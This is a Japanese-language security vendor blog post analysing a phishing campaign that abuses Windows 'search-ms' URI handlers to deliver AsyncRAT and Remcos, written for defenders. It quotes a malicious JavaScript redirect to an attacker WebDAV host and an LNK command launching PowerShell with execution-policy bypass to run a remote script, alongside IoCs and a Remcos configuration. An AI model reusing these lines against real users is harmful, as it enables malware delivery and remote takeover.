ファイル検索の先に:”search-ms “URIプロトコルハンドラを悪用する新たな手法


脅威の概要

日々進化するサイバー脅威の中で、マルウェアの作者は、疑うことを知らないユーザーを悪用するための新たな手段を絶えず模索しています。Windowsオペレーティング・システムには、ユーザーがコンピュータ上のファイル、フォルダ、その他のアイテムを素早く見つけることができる強力な検索機能が用意されています。この検索機能のあまり知られていない側面の1つに、ローカル検索を実行するための拡張検索機能を提供する「search-ms」URIプロトコルハンドラがあります。また、リモートホストにあるファイル共有に対してクエリーを実行する機能も提供しており、Trellix Researchのブログで説明されているように、これを悪用することも可能です。

Trellix Advanced Research Center は、”search-ms” URI プロトコルハンドラを利用した新しい攻撃手法を発見しました。私たちは、攻撃者が悪意のある文書を通じて「search-ms」URIプロトコルハンドラを悪用していることをすでに認識していましたが、私たちの調査により、攻撃者のアプローチが進化していることが明らかになりました。私たちは、攻撃者がページ上でホストされているJavaScriptを使用して、「search-ms」機能を悪用するウェブサイトにユーザーを誘導していることを発見しました。この手法はHTMLの添付ファイルにまで拡張され、攻撃対象が拡大しています。私たちの研究では、「search-ms」プロトコルの機能だけでなく、「search」プロトコルについても調査しました。search」アプリケーション・プロトコルは、Windows VistaのSP1以降のバージョンで作成されました。オペレーティング・システムは、デフォルトのデスクトップ検索アプリケーションを起動するためにsearchプロトコルを使用します。両方のプロトコルのパワーを活用し、バッチ、Visual Basic、PHP、PowerShellなど、さまざまなスクリプトファイルで検索機能を利用することに成功しました。これは、悪意のある活動を実行するために両方の検索プロトコルの機能を利用するという、この攻撃手法の多様性と有効性を示しています。

「search」/「search-ms」URIプロトコルハンドラを活用した攻撃では、脅威行為者は、ユーザーを危険なWebサイトにリダイレクトするハイパーリンクや電子メールの添付ファイルを含む偽の電子メールを作成する可能性があります。ユーザがウェブサイトにアクセスすると、悪意のあるJavaスクリプトが「search」/「search-ms」URIプロトコルハンドラを使用してリモートサーバ上で検索を開始します。リモートでホストされている悪意のあるショートカットファイルの検索結果は、ローカルの検索結果と同様に、PDFやその他の信頼できるアイコンとしてWindowsエクスプローラーに表示されます。この巧妙なテクニックは、ユーザーにリモートファイルが提供されているという事実を隠し、ユーザーに信頼の錯覚を与えます。その結果、ユーザーは自分のシステムからのファイルだと思い込んでファイルを開き、無意識のうちに悪意のあるコードを実行してしまう可能性が高くなります。

このブログでは、脅威行為者が「search-ms」URIプロトコル・ハンドラを悪意のある活動の手段としてどのように活用しているのか、また、最初の配信からペイロードの実行に至るまでのステップについて包括的に理解することを目的としています。


感染の連鎖

Figure 1: Execution flow of the attack
図1:攻撃の実行フロー


フィッシングの実例

Trellixアドバンストリサーチセンターは、”search-ms “URIプロトコルハンドラを使用し、悪意のあるペイロードをダウンロードするフィッシングメールを確認しています。これらのフィッシングメールは、営業部長からの緊急の見積依頼であるかのように装い、受信者を騙して悪意のあるリンクをクリックさせようとしています。

Figure 2: Sample phishing emails
図2:フィッシングメールのサンプル

私たちの調査では、HTMLやPDFの添付ファイルを持つ電子メールの利用など、他の形態の攻撃亜種に遭遇しました。これらの添付ファイルには、「search-ms」URI プロトコルハンドラを組み込んだ侵害されたウェブサイトのホスティングスクリプトにつながる URL が含まれていました。さらに、HTMLファイルにも、「search-ms」URIプロトコルハンドラの実行をトリガーするスクリプトを埋め込むことで、攻撃を開始することができます。

Figure 3: PDF files with URL containing the “search-ms” URI protocol handler
図3:”search-ms “URIプロトコルハンドラを含むURLを持つPDFファイル

電子メールや添付ファイルのリンクをクリックすると、受信者は「search-ms」URIプロトコルハンドラを悪用したウェブサイトにリダイレクトされます。以下では、図2のpage.htmlに対するGETリクエストを見て、疑わしいスクリプトを強調しています。

Figure 4: HTML with “search-ms” URI Protocol Handler
図4:”search-ms “URIプロトコル・ハンドラを使ったHTML

見えない脅威:URIプロトコル・ハンドラ “Search-MS “のダークサイドを解明する

上の図で強調表示されているコード・スニペットは、「search-ms」URIプロトコル・ハンドラを呼び出して、攻撃者がコントロールするサーバー上で検索操作を実行します。コードを分解し、その構成要素を理解しましょう。

  • <script></script>と記述します:このコードは<script>タグ内にカプセル化され、HTML文書内のJavaScriptコードを示します。
  • window.location.href:このJavaScriptステートメントは、ウェブページの現在のURLまたは場所を参照します。このプロパティを変更することで、ユーザーを別の場所にリダイレクトすることができます。
  • ‘search-ms:query=Review&crumb=location: \dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSLDavWWRoot&displayname=Search’:これはwindow.location.hrefプロパティに割り当てられた値です。ユーザーがリダイレクトされるターゲットURLまたは場所を表します。
  • search-ms:これはWindows Searchプロトコルの使用を示すプロトコル識別子です。
  • query=Review:query “パラメータは検索条件を指定し、この場合は “Review “に設定されています。これは、検索操作が用語「レビュー」に関連するアイテムを見つけることに焦点を当てることを示します。
  • crumb=location:◆dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSLDavWWRoot:crumb」パラメータは、検索の場所またはパスの制約を定義します。値 “location: \dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSLDavWWRoot” は、検索を実行する特定の場所またはフォルダパスを指定します。
  • displayname=Search:displayname “パラメータは、検索クエリのカスタム名を設定します。

すべてをまとめると、このコードはwindow.location.hrefプロパティを設定し、「search-ms」URIプロトコル・ハンドラを使用して検索操作を開始します。検索は、指定された場所(ここではリモート・ファイル・サーバー)内の「Review」に関連するアイテムを探します。

クリックの裏側ユーザー・インタラクションを理解する

電子メールの受信者が悪意のあるリンクをクリックすると、通常、「Windowsエクスプローラを開く」という警告がクリック可能なボタンとして表示されます。これをクリックすると、ユーザーは検索クエリに一致するファイルが保存されているフォルダまたはディレクトリに移動することができます。

Figure 5: Warning to Open Windows Explorer
図5:Windowsエクスプローラーを開く警告

ユーザーがWindowsエクスプローラーを開くことを許可した場合、実行される操作に 応じて、いくつかのリクエストがサーバーに送られます。図6から、サーバーがサポートする利用可能なメソッドと機能を取得するために送信されるOPTIONSリクエストを観察します。

Figure 6: Options request
図6:オプションのリクエスト

さらに、PROPFIND メソッドの使い方も見てみましょう。これは、サーバ上のリソースやコレクションに関連付けられたメタデータやプロパティを取得するものです。これらのプロパティには、リソースの名前、サイズ、作成日、変更日、その他のカスタム定義属性などの情報を含めることができます。このメソッドは、図4(query=Review)で述べたように、「Review」という用語に関連するアイテムを検索するために使用されます。多 く の場合、 検索はデ ィ レ ク ト リ のルー ト か ら 始ま り 、 PROPFIND メ ソ ッ ド の再帰的な動作に よ っ て項目が取得 さ れ る か ど う かはサーバの設定に よ っ て異な る 可能性があ り ます:

Figure 7: PROPFIND method to find items related to term “Review”
図7:用語 “Review “に関連するアイテムを見つけるPROPFINDメソッド

WebDAV のファイルに対する PROPFIND メ ソ ッ ド に対 し て受け取 ら れ る 応答は、 通常 XML 形式の応答であ り 、 その中に要求 さ れたプ ロ パテ ィ やフ ァ イ ルの メ タ デー タ が含まれてい ます。XML レスポンスの正確な構造や内容は、WebDAV サーバーの実装や要求されたプロパティによって異なります。しかし、レスポンスにはファイルのプロパティを表す要素と属性が含まれます。

Figure 8: PROPFIND method response
図8:PROPFIND法のレスポンス
 Figure 9: XML Format PROPFIND method response
図9:XML 形式の PROPFIND メソッド応答

ショートカットファイル(Review_200630_DeletedItem.lnk)のプロパティを受信すると、GETメソッドを使用してファイルの内容を取得します。

Figure 10: Retrieving shortcut file with GET method
図10:GETメソッドによるショートカット・ファイルの取得

図4で述べた “search-ms “クエリーで提供されたパラメーターに基づき、Windowsエクスプローラーのウィンドウは、”Review “に関連するアイテムの検索結果を以下に表示します。

Figure 11: Windows Explorer window with the search result
図11:検索結果が表示されたWindowsエクスプローラウィンドウ

この攻撃で使用された他のショートカットファイルの一部を図12に示します。攻撃者は、疑うことを知らない被害者を騙すためにさまざまな手口を用いますが、ショートカットファイルのアイコンやファイル名を操作することもその1つです。このような欺瞞的な手口は、人間の心理を巧みに利用し、ユーザーを悪意のあるコンテンツに誘導するために注意深く作られています。攻撃者は、正規のアプリケーションに似せたアイコンを割り当てたり、緊急性や重要性があるように見えるファイル名を選択したりすることで、誤った信頼感や緊急性を植え付けることを目的としています。また、ショートカットファイルの各バリエーションは、固有のシグネチャやフィンガープリントを持つ可能性があり、セキュリティツールによる識別やブロックが困難になります。

Figure 12: Windows Explorer showing different shortcut files based on search keyword
図12:検索キーワードに基づいて異なるショートカットファイルを表示するWindowsエクスプローラ

被害者が開いたショートカット・ファイルをクリックすると、コマンドラインで参照されている悪意のあるDLLファイルがregsvr32.exeユーティリティを使って実行されます。

FFigure 13: Shortcut file command
図13:ショートカット・ファイル・コマンド

Figure 14: DLL file retrieved using PROPFIND and GET method
図 14:PROPFIND と GET メソッドを使用して取得した DLL ファイル

すべてのネットワーク・アクティビティにおいて、攻撃者はネットワーク保護対策を回避する巧妙な戦術としてSSL(セキュア・ソケット・レイヤー)暗号化を採用しています。SSLを活用することで、攻撃者は暗号化されたトラフィック内に悪意のある活動を隠すことに成功し、従来のネットワーク・セキュリティ制御を効果的に回避しました。この攻撃の本質を明らかにするために、キャプチャされたネットワーク・トラフィックは、説明のために復号化されています。この復号化により、攻撃者が利用した高度なテクニックを分析・理解することができ、攻撃者の戦略に対する貴重な洞察が得られるとともに、このような脅威と闘うための知識を深めることができます。


代替テクニックPowerShellベースの攻撃バリエーション

このバリアントでは、SwiftCopyショートカットファイルは以下のパラメータでPowerShell実行ファイル(powershell.exe)を実行します:

  • ‘-ExecutionPolicy Bypass’ でPowerShellの実行ポリシーをバイパス。
  • ‘-File \internetshortcuts[.]link@80ePWXBTXUЪover.ps1’を指定して、指定されたネットワーク場所にある ‘over.ps1’ という名前のPowerShellスクリプトファイルのパスを指定します。

このコードは、スクリプトの実行を制限することなく実行するように設計されているため、潜在的に有害なコマンドやアクションを実行することができます。

Figure 15: Swiftcopy LNK file execution
図 15:Swiftcopy LNK ファイルの実行

調査中、このキャンペーンで複数のPowerShellファイルの亜種を発見しました:

  • over.ps1」ファイルは、ISOファイルをダウンロードし、そこからDLLを抽出し、DLLを特定のディレクトリにコピーし、regsvr32.exeを使って登録し、仮想ディスクをマウント解除します。
  • ISOファイルを使用する代わりに、PowerShellスクリプトがDLLペイロードを直接ダウンロードし、それを実行する亜種。
  • EXE ペイロードを含む zip ファイルのダウンロードをトリガーする PowerShell スクリプト。
  • DLLファイルをダウンロードして実行するPowerShellスクリプトと、被害者を欺くためのおとりPDFファイルのオープン。
  • VBSファイルをダウンロードして実行するPowerShellスクリプト。VBSファイルはPowerShellを実行し、悪意のあるDLLを正規のファイルにインジェクションし、おとりPDFファイルを開いて被害者を欺きます。

Figure 16: Variants of PowerShell file used in this campaign
図16:このキャンペーンで使用したPowerShellファイルのバリエーション

Figure 17: Dynamic Execution of PowerShell variant using ISO file
図 17: ISO ファイルを使用した PowerShell バリアントの動的実行


悪意のあるペイロードが解き放たれる:リモートアクセス型トロイの木馬の動き

このキャンペーンでは、ダウンロードされたペイロードはリモートアクセストロージャン(RAT)であり、具体的にはAsync RATとRemcos RATです。RATは、権限のない個人が感染したシステムを遠隔操作できるようにする悪意のあるソフトウェアです。RATがターゲットに感染すると、機密情報の窃取、ユーザー活動の監視、コマンドの実行、さらには他の接続デバイスへの拡散など、さまざまな悪意のある活動を実行することができます。

注目すべきは、Remcos RAT の EXE ペイロードにヌルバイトが注入されていることです。これは、セキュリティ製品による検出を回避するために採用されている手法です。ヌルバイトを実行ファイルに注入することで、RATはファイルのシグネチャやパターンに依存するセキュリティメカニズムを回避することができ、検知されずに動作し、侵害されたシステム内に侵入して持続する可能性を高めることができます。Trellixは、検出を回避するために使用されるこのようなテクニックを特定し、軽減する機能を備えています。


検知を逃れる:攻撃者が巧妙に利用するファイルの範囲に迫る

調査の結果、攻撃者は定期的にファイルを更新することで、プロアクティブなアプローチを採用していることがわかりました。この戦略は、セキュリティ製品による検知を回避するために意図的に採用されています。ファイルを頻繁に更新することで、攻撃者は静的シグネチャや既知の侵害指標に依存するセキュリティ対策を回避することを目的としています。

Figure 18: Multiple html used as initial attack vector found on compromised website
図18:侵害されたウェブサイトで発見された最初の攻撃ベクトルとして使用された複数のhtml

また、攻撃者が管理する複数のファイル・サーバーが発見され、これらのファイル・サーバーはさまざまな悪意のあるファイルやツールのリポジトリとして機能していました。さらに問題だったのは、正規のサーバーのいくつかが適切な認証手段を欠いており、攻撃者に無制限のアクセスを提供していたことです。このようなサーバーへの無制限のアクセスは、攻撃者がこれらの弱点を悪用して比較的簡単にさらなる攻撃を仕組める可能性があるため、深刻なセキュリティ・リスクをもたらしていました。

Figure 18: Multiple html used as initial attack vector found on compromised website
図19:攻撃者のサーバーで確認された複数のファイル

というのも、ドキュメントを悪用する対象者は、脆弱なバージョンを持っていないかもしれないし、パッチを当てているかもしれないからだ。しかしこのケースでは、単にURLを訪問しただけで攻撃が開始されました。

調査中、我々は “search”/”search-ms “プロトコルが下図に見られるようにHTMLファイル内で複数の方法で実行できることを発見し、その柔軟性と異なるシナリオでの悪用の可能性を明らかにしました。

Figure 20: Several ways of executing search query in HTML file
図20:HTMLファイルで検索クエリを実行するいくつかの方法

脅威行為者は、「search」/「search-ms」URI プロトコルハンドラを使用して、さまざまなファイルタイプを使用した攻撃を仕掛けることができます。私たちの調査では、バッチ、PowerShell、Visual Basic、PHP、Officeマクロファイルなど、さまざまなファイルタイプでこのプロトコルを利用することに成功しました。スクリプトファイルにこの方法を採用することで、図5に見られるようなWindowsエクスプローラーを開くアラートが表示されなくなり、ユーザーとのインタラクションが減少することが確認されました。この方法は、適応性が高く、アクセスしやすいため、他の脅威行為者にとって魅力的な手口である可能性があります。

Figure 21: Execution of search ms query using different file types
図21: 異なるファイル・タイプを使用した ms 検索クエリの実行

search」/「search-ms」URIプロトコル・ハンドラを無効にするには、管理者権限で以下のコマンドを実行:

  • reg delete HKEY_CLASSES_ROOTsearch /f
  • reg delete HKEY_CLASSES_ROOTsearch-ms /f

結論

search”/”search-ms “URIプロトコル・ハンドラーは、強力な初期攻撃ベクトルとして出現したため、この方法を利用した攻撃が増加する可能性を予測することが極めて重要です。これは、従来のセキュリティ防御を回避しながら悪意のあるペイロードを配信する便利な手段を脅威行為者に提供します。安全を確保するためには、ユーザーは信頼できないリンクに注意し、警戒する必要があります。不審なURLをクリックしたり、未知のソースからファイルをダウンロードしたりすることは、システムを「search」/「search-ms」URIプロトコル・ハンドラを通じて配信される悪意のあるペイロードにさらす可能性があるため、控えることが極めて重要です。この手法を利用した攻撃の増加傾向を認識し、リスクを軽減するための積極的な対策を講じることで、セキュリティ体制を強化し、このような新たなサイバー脅威から効果的に保護することができます。共に、進化し続けるサイバー攻撃に対抗するため、警戒、適応、情報収集を怠らないようにしましょう。


Trellix製品のカバレッジ

Trellix Email Securityは、URL、メール、ネットワーク、添付ファイルの各レベルでのチェックを含む多層的な検知戦略により、潜在的な脅威を確実に発見し、お客様に害が及ばないようにします。新しい脅威や変化する脅威に先んじるために、私たちの製品は継続的に脅威インテリジェンスデータベースを監視し、更新しています。これには、Trellix Multi-Vector Virtual Execution Engine、新しいマルウェア対策コアエンジン、機械学習による振る舞い分類とAI相関エンジン、Trellix Dynamic Threat Intelligence (DTI) Cloudからのリアルタイムの脅威インテリジェンス、および攻撃ライフサイクル全体にわたる防御が含まれ、お客様の組織をより安全で回復力のある状態に保ちます。


Trellixの保護

Product

Signature

Endpoint Security (ENS)

Trojan-FVIY
HTML/Agent.s
LNK/Agent.ab
PDF/Phishing.u
VBS/Agent.je

Endpoint Security (HX)

Generic.Exploit.CVE-2022-30190.J.1517B09C
Generic.mg.163a08fb103a81ba
Gen:Variant.Mikey.148203
MALICIOUS FILE EXECUTION VIA SHARED STORAGE (METHODOLOGY)
WINDOWS SEARCH PROTOCOL EXPLOITATION (METHODOLOGY)

Network Security (NX)
Detection as a Service
Email Security
Malware Analysis
File Protect

FEC_Downloader_HTML_Generic_31
FE_Loader_Win64_Generic_148
Trojan.Downloader
FEC_Trojan_LNK_Generic_11
Phishing_JS_Downloader
FE_Trojan_MSIL_Generic_189
FE_Trojan_MSIL_Generic_257
FE_Backdoor_MSIL_ASYNCRAT_3
Malicious ASYNCRAT Indicator
Malware.Binary.lnk
Malware.Binary.exe
Malware.Binary.vbs

Helix

1.1.3858- WINDOWS METHODOLOGY
 [SearchNightmare – search-ms]


MITRE ATT&CK® Techniques

Tactic

Technique ID

Technique Name

Reconnaissance

T1589

Gather Victim Identity Information

Initial Access

T1586.002
T1586.002

Compromise Accounts: Email Accounts
Compromise Infrastructure: Domains

Initial Access

T1566.001
T1566.002

Spearphishing Attachment
Spearphishing Link

Execution

T1204.001
T1204.002
T1059.001
T1059.007 T1218.010
T1053

User Execution: Malicious Link
User Execution: Malicious File
Command and Scripting Interpreter:
PowerShell
Command and Scripting Interpreter:
JavaScript
System Binary Proxy Execution:
Regsvr32
Scheduled Task/Job

Persistence

T1053

Scheduled Task/Job

Defense Evasion

T1036.008
T1564.003 T1497 T1140
T1218.010
T1055
T1140

Masquerading: Masquerade File Type
Hide Artifacts: Hidden Window
Virtualization/Sandbox Evasion
Deobfuscate/Decode Files or Information
Regsvr32
Process Injection
Deobfuscate/Decode Files or Information

Discovery

T1012
T1082
T1497

Query Registry
System Information Discovery
Virtualization/Sandbox Evasion

Command and Control

T1571
T1071
T1573

Non-Standard Port
Application Layer Protocol
Encrypted Channel


侵害の痕跡 (IoCs):
Hashes

LNK Files

485d446c5892b931c0a3a238dca84bebb787052c877deb73f02ae5ee5632de9d

a2144301067495656391aaa937e47b27706d7db8ea7fd12412e7796196f91fe8

31038f7ee74463661addd7378b26076898e20d19e69f672f829af07b8ff816a9

25f616a8bce8578219bc884a64d1a3bc60ec87f07cdff8da3c386ae5b49445a9

c91527db707347d7970e8197c8a11446c40d945adfb47eb68f666b02f56d8c22

d9b56c6bf2c52116855a79e0008b6cfd7baef20e5af06ba142f774c8bf3b7401

d99ed5b55440cefd33047490937b9b729f6b7a93bcb7d3877d07391fbec2a13a

1b004980738e868605f88d6b764f72d0d6c50fddea3a7bdf4508ff3057501562

83c8f1d9b27d9e455ad2602b1005f6837ac6040cf61acc3124f7179fd5894d27

b8998dff4684d815538b1c57c3bba0f9914f8436fde99ddedc1e9b1e658dabcb

0b28a2dcb365ac02b7d6c3928d5a1cfdd5ed669206eb176ab65ebb6084b58545

9b5c8b82828c0aa94956671b3b9f2a6ec4f34a642d621938e86bffe9ce8b1acb

2da9b5bef5ced856c6367e990dc2bf0424ad2c551016c3f1d2068b9284310e53

5be46ac9b6fd4d07db8710315b6fa8597464756005235472cf1562a0398921bf

e3d4c11ea01f0b927bac052aa01e246cd2890445d848a7abe4b03882cccaaaf7

4d8ff026a14c03fc7fce40fe5bb9c287320f66102693e74e40a48247999f4a0a

afff3e377a5c13a9707680ed926c15718eeb2d3b4d9dcf0993019b3766fc16aa

fc226deb01a8d15acf98fd6e9daa3d95b73687f46e9029523fd7e8fe8ad5fb83

b4bded423c23574c5080f449d7c92c95b7aa480fedb756568d7280db3ec80cf0

597f58f1ec035d553dc5f5e9e0d0d0ed656a2488f5f93c30bf528278b3d615a1

ed34e71d2fcae823b130a7e54a4404c15e34060e45c73654d16f34c799f91509

901dd6b7fb5aae90840191eb5e0b8e2578503feaef93fd58b99a3314a2008b4b

6643aba0f5318fe279c1cae871ec32540b65265a68fb98aedae5a6fc0707b3c7

8a22b626a893ed2bcf9f63ffe5dcb2198f7d5dc991b5cec434e8b0f050ebbfeb

ea2c8d68c83a93b4f526d2bdb25aa20920b43b7985b9bb8a8109912b74adf1df

a3f5a76a50819ed856e22e690989f4e0b1bf6c88bab3d989868700cafa26c4b7

09dc1f4a21f9b36a0ceeef791d2bf3463299d172712943139ace33d476d7d7c2

5b7fdc6714e6e2f7f91a1b895204d630561f1f1431636875f6a270f3db06a55b

f80caed9f1b4d71e61a2869c240206f55c44fb9075d4da283df0bcedf7a11d3a

90202f38f8c813d2e09063432542573e3e7792b9111f2c56d12a451c9dd25b48

47097f706f72ac8979bfd846d779f3c520f47241b83563dbbcf0e4df94805a21

bbaf94b8be1c355328e5db962577b26ae73f9c3fbf81e6892019bffbf0513698

d626716fe7b26f3299438cca864216c3dacadaba145ce2decc2eededb3d4bf38

40f99a875efa382cc0cae003c7b3b0519a7fcaa10a95989103b1e3e2bb20832a

52cebb58ec92cf411ea8482502d8aea3580ded02edc1482609283e0dff541dec

437b82a5533485ce26a8b983cffa787e629120422e49b28a2608337158c883fc

84d9b5159f937e5f1c98e221d23546fb38775097e983fb660144b4d4a8955582

c519d06e252a1cf04f8fb38f20c76a39363e51bf31864bac638f662a698b244e

5d7e304d77bedb970a1c9a5b3aa6f5c4252825c9c0a94fe60ec56a0f1b2664b5

1598486e69f94e221dcbd02b10bb33352baf5886db9c06475470159ab16eadbd

923c2a87d2321c3fb172d8998574f4d2695e6c8f5f5d5d568c26aefb5fe2d198

a531edd712eb0beabe14cb4e9ff91dc7635b743e71b6fdc20ec4c0247eccff62

7c1aa45ce5d254ffaefea8396128a55318bf937fbb3400b327f5dc528134730d

f4b055a61d096e2f111bdaf7b171719188c02d74fa946dabdae0bbc72671d2db

58addf5e77b1dd45ead377c2a8d52b12a0db4edbc607f17b650c27428e24bbfd

964f9489714241afd3c422eb164fe96dfe72c12ab1d3f58613694f73bc7e839e

5a47b18066d8dcd0fbc524f529002cf0a270d8394de928e8426fa06959a82704

388f736c54cb1e57d5877d35da5ecdcf46b88ad2e44ca5d2ecffa0dcf0e1b8d9

4daafeb8ae95460be3ef93577983db33cca28ecb67fff9b958a7f71ae17504bf

DLL File

d6fcf0bcebcac7aa5e7b21b189dbd89f314f79871b770911a7d7b780207fb83d

d0b0f7842587afe7e23fc0218fd0a391996e72b1a804a6bfc33e97d9aecb6b2e

f21010eb8c0f2fd23c4ee941a394853597bfb90527f43f3c61bf6ce004b7f367

a9f132dc514d4598a29d004a38e71d3a389e43b46149a36314d2f55e20e1ebb6

fad17294a3fd687d75f49040c837af39ca2bb9ea84e022aa750e81ddc4cd1583

811bba52ccee8ee0dce9f96f402a7c33427622276028bfb5e9d661130fa0e3fc

45cd3d4ec91bf68bc975d99d90612e459aeb4a0f31321a440d7d41fcdea798f3

72a79351d602ce6a1d0267bcd6d57c17cd8adc44c78197138cc3be5f4100b5b6

b5b3747f8b0d11b5217a7a39c2420fb5a0c1044c82cbe9cba596dacf521a1a01

19e75218473b112e65cec4c2c5afd0c3cc6b4fb8f847127018e0815bd64b6480

fe6a8beb35f9550615cb3190b1b207bbe11c23a16248644c09ba0d007822c132

f493a5a65d460bd53b05fde1ee5562db08e52c34989321a9bd09ecc5dc3f4d6d

41960d1cd749289ff40a1c92970706ead76f73fb3b61276a2f34a7ac38f989c6

de0a1c35121a6e08bf07267aca78fb8fe9c46ead95ed1acebfb3a77b72e869b8

f80553b2b50775cdad4c40529b4fb9461b1758a6007edd7c22df09238885201

3dfc781c1b656925b91a22b48b85b6ce2bf8f9cb9c1288be6ec3b760f6f7402d

188baeb6bf2b009adc2efb648b068be71d5b55d1d11e000c473b429f3dda4a86

f2c577360fbf36859eeb194970f734810f2954493e5428d71add4edb6c11c4f1

15f8dd0880d76be36de65dd8412d7171d2cc00c35d3461452dfdae2f657aaf31

2b84ab32982a3f9cc03dd4f020751dcaaf8ad5ef32d0e7975a0b1d17045ee07e

7316651d2e38599d6e46a1ac52dff4eee7ae16f22e87cd244efb9a6ed748f358

0764a24f94d829a625cca37f92863a84553db77469b68eadf875e73fcf0d3036

HTML File

9851dbd8a7e9b52e6745b7fb2ff854ce573d4a56be0cd0b700a30eca15e331e5

PDF File

bd33b3aa897df0702913dbecd5ad2f7e63df11f4c2a7e461dad7f89abe218a45

540744100c8a0eba6c4d24fcee5df40a274ecd51f33c41e11dbe482bd32d271d

7a69202cb54dd828736d63dae6b948fcef815658859f1d10220727d242eb6fd4

776d7ce582c1e3af65b60073986c78da394cbbab1bf6b83a6c0d736c58d33758

1c450bca78ecf77fc5c9b03ced93f5410f03804fcbf17c9c5e584770eec03403

b26144c6e42601f1f1be09ece7c7fcb127637db3b953065648d1b1f371da7e8a

f0f932c136c2d34b0f9da7a83e1a2f87063ea2bce48d3a9af004189bf49d98d9

98ab2fc44063d4e00f221e502419d9cca598fafb9e1e00352149327267604bc1

6e7f4d594ee4f5d5f08321ede7c32e51d72acbd0700f37c621f9145d8c86309d

904343ba2502d390b36403181e77192a62f31e98c87eb91906fbae27019b4c0d

3d87877bfb6da476da1f51410416bef22cc216d941c79268f6de17d8dde1c0b8

Powershell Script

c2f10c9556eecd1ffe67e763190c630262dfdb593245357283b02df2b4d696de

5c31f5cfa003b1f745eb5019d76aa43f06a7d46c6403eeb2deabd44ee1a1a97a

4c1cb32e0a142d55997a55bfc239e4b5b31a6e021014d023d5ff9787948490df

4f8ba8eec38e117fa323bc24074993a7f1cc31c5ce112f9c6696c724628f53dc

dd28b5740c0fb2890a7579d75c65cf09a36ba5d9fc5df5c9581771e40420f35b

56a2692cbde566ca149ef196f9bf4f843839f36ebfdb8acd47acaf2cd01703e9

9466d718154c26b8d003b99faff2a8868e2a26788e2946b68245e6dfe54da610

c1cae7181fab03d16c8e10dbe0993319dca6597e2a2f28ba07014d64f996a1fa

ce3cfcc3cd86936aff5d43de6f0298cc8f0c5cfd7675d951dd23de53c3b8b154

c8c5386fef1b6e45e02323f3a45b1e73b5d5be60a8a5f5ebe3b95bce77b03167

88aeb09dcc59858c9969b7ae1e0e2b58f0aa90b2d27a5edfe9cd82e602ed5952

VBS File

f214a42d57e88b6d77b036934cf93fb9c9126335925bdafc9bb8a326abe2d652

4867eebb0f6bca553c7d50e878e3cb19f7471c1c89cbd85f49b6d50f7a44e779

ISO File

cef2c8a040fe4d27843f601b76c13169fcc0f1d5c7f20e71e830967dffa89baa

ZIP File

c7bdce98567809f96907d5a005ae7ff8295c63b9d93aa2a9846f903d688fd657

EXE File

19cd76a94c55380cc6b053b05eb8896fa1329f03d65a7937225196c356bb0c6a

ASYNCRAT From Memory

db27ba01238ce49683b68bc9c2b925caac6008ae178d14c0dce4cce161bde746

Domain/Host/URLs

dhqidgnmst61lc8gboy0qu4[.]webdav[.]drivehq[.]com

dhqidlu10mna2tuk2qfoaew[.]webdav[.]drivehq[.]com

dhqid9pjapv63d8xvji8g4s[.]webdav[.]drivehq[.]com

dhqidvjn6bfvi00cb0834a3[.]webdav[.]drivehq[.]com

dhqidvdosqx8tu0vq1h1d1g[.]webdav[.]drivehq[.]com

dhqidctjo3ugevk9u5sev1r[.]webdav[.]drivehq[.]com

dhqido7gy8hiehwprjhli16[.]webdav[.]drivehq[.]com

dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com

dhqidee98lja03f52atdmii[.]webdav[.]drivehq[.]com

dhqid5neul4wc9w74pynlrs[.]webdav[.]drivehq[.]com

dhqidqot3k8sh7ve2ns9nry[.]webdav[.]drivehq[.]com

dhqidoakoljbb9jnbssiau2[.]webdav[.]drivehq[.]com

dhqidlnsxx2qigisdvn7x2f[.]webdav[.]drivehq[.]com

dhqidwhws4rkw80f312lkpm[.]webdav[.]drivehq[.]com

dhqidhhva53s2qvmxwxtkrm[.]webdav[.]drivehq[.]com

dhqid3b4b9u6ecv6jcxva0f[.]webdav[.]drivehq[.]com

dhqid45r064utd5gygt2jy6[.]webdav[.]drivehq[.]com

dhqidhx2c2f2oc8lccg38tx[.]webdav[.]drivehq[.]com

dhqidvooruijtwg0lyucl5s[.]webdav[.]drivehq[.]com

dhqidk9oi3yuhf43sb05xgn[.]webdav[.]drivehq[.]com

balkancelikdovme[.]com

pdf-readonline[.]website

hxxps://designwebexpress[.]com/Invoice_3211.html

hxxps://designwebexpress[.]com/Invoice[.]html

hxxps://designwebexpress[.]com/Invoice_3221[.]html

hxxps://designwebexpress[.]com/Invoice_4221[.]html

hxxps://transfer[.]sh/get/Ja9CVWbDzf/invoice[.]zip

hxxp://internetshortcuts[.]link/VdXiIRQo/payload[.]iso

hxxps://efghij[.]za[.]com/Invoice_662243[.]html

hxxps://bridgefieldapartmentsapp[.]ie/EX

hxxps://efghij[.]za[.]com/Invoice_898277[.]html

hxxps://bridgefieldapartmentsapp[.]ie/EX/index[.]html

hxxps://www[.]cttuae[.]com/ems/page[.]html

hxxps://chemaxes[.]com/Invoice-Payment[.]html

hxxps://fashionstylist[.]za[.]com/Invoice_82637[.]html

hxxps://reasypay[.]sa[.]com/Invoice5691[.]html

hxxps://lfomessi[.]za[.]com/home[.]html

hxxp://172[.]245[.]244[.]118/home[.]html

hxxp://172[.]245[.]244[.]118/Quote[.]html

hxxps://cargopattern[.]shop/page[.]html

hxxps://efghij[.]za[.]com/Invoice_72638[.]html

hxxps://fashionstylist[.]za[.]com/Invoice_898277[.]html

hxxps://fashionstylist[.]za[.]com/Invoice_0020317[.]html

hxxps://landtours[.]rs/BB/index[.]html

hxxps://www[.]shorturl[.]at/asAFO

hxxps://shorturl[.]at/asAFO

hxxps://cargopattern[.]shop/home/home[.]html

hxxps://bridgefieldapartmentsapp[.]ie/home[.]html

hxxps://designwebexpress[.]com/Invoice_6211[.]html

hxxps://designwebexpress[.]com/Invoice_5221[.]html

hxxp://seductivewomen[.]co[.]uk/invoice44201[.]html

Remcos Configuration

Hosts: gainesboro[.]duckdns[.]org:30277

Botnet: QB-1

Connect_interval: 1

Install_flag: False

Install_HKCU\\Run: True

Install_HKLM\\Run: True

Install_HKLM\\Explorer\\Run: 1

Install_HKLM\\Winlogon\\Shell: 0

Setup_path: %LOCALAPPDATA%

Copy_file: remcos.exe

Startup_value: True

Hide_file: False

Mutex_name: pqowndhk-KEQR6K

Keylog_flag: 1

Keylog_path: %LOCALAPPDATA%

Keylog_file: logs.dat

Keylog_crypt: False

Hide_keylog: False

Screenshot_flag: False

Screenshot_time: 5

